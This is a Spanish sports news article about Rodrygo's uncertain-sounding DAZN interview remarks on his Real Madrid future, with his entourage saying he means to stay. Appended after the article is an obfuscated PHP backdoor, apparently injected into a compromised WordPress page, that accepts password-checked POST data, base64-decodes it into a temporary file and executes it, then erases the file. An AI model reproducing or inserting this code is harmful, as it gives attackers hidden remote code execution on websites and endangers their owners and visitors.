Rodrygo se lía con su futuro

El brasileño arroja incertidumbre sobre su futuro en una entrevista con Dazn que se emite el jueves. Su entorno matiza lo dicho, esgrime un error con el idioma y asegura que no hay duda alguna: Rodrygo quiere quedarse en el Madrid.

A falta de unos días para que el Real Madrid afronte una nueva final de la Champions League siguen apareciendo declaraciones de los jugadores de la plantilla. El brasileño es el gran protagonista de una entrevista realizada el lunes en el Media Day del Real Madrid, que será emitida el jueves por DAZN, donde repasa todos los temas de actualidad del Real Madrid en una semana clave para el futuro del club de Chamartín.

En el avance que ha lanzado el canal televisivo, la periodista Sandra Díaz Arcas pregunta al brasileño por su futuro, y una vez que se difundió ese extracto en las redes sociales la noticia sobre un posible futuro del jugador fuera del Madrid comenzó a correr como la pólvora. Esta es la transcripción exacta del extracto emitido por Dazn como adelanto.

-”Te quiere toda Europa, pero ¿tú quieres al Madrid para siempre?”.

-”Sí, bueno… Todo puede pasar. Tengo contrato aquí pero… los años que ya he estado aquí fue un placer para mí”. (Mientras el jugador está contestando hay varios parones mientras se emiten imágenes suyas de diferentes partidos con goles suyos).

-”No pongas nerviosos a los madridistas…”

-”No, no, tranquilo (…) Como he dicho, yo siempre quiero estar en este club pero, a ver…”.

Sin embargo, en otra entrevista a El Desmarque, también realizada en el Media Day, Rodrygo sí fue más contundente con respecto a su futuro: “Estoy feliz en el Real Madrid. Es el club en el que siempre he soñado jugar. ¿Mbappé? Es un problema para el míster, no para mí. Siempre digo lo mismo. Yo siempre quiero jugar con los mejores. Me va a encantar jugar con él”.

El entorno del jugador se encargó rápidamente de matizar las declaraciones de Rodrygo, el tiempo verbal usado durante la entrevista no era el que pretendía el futbolista. Según este mismo entorno, no hay ninguna duda de que seguirá vistiendo la camiseta del Real Madrid la próxima temporada ni de que quiere quedarse.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}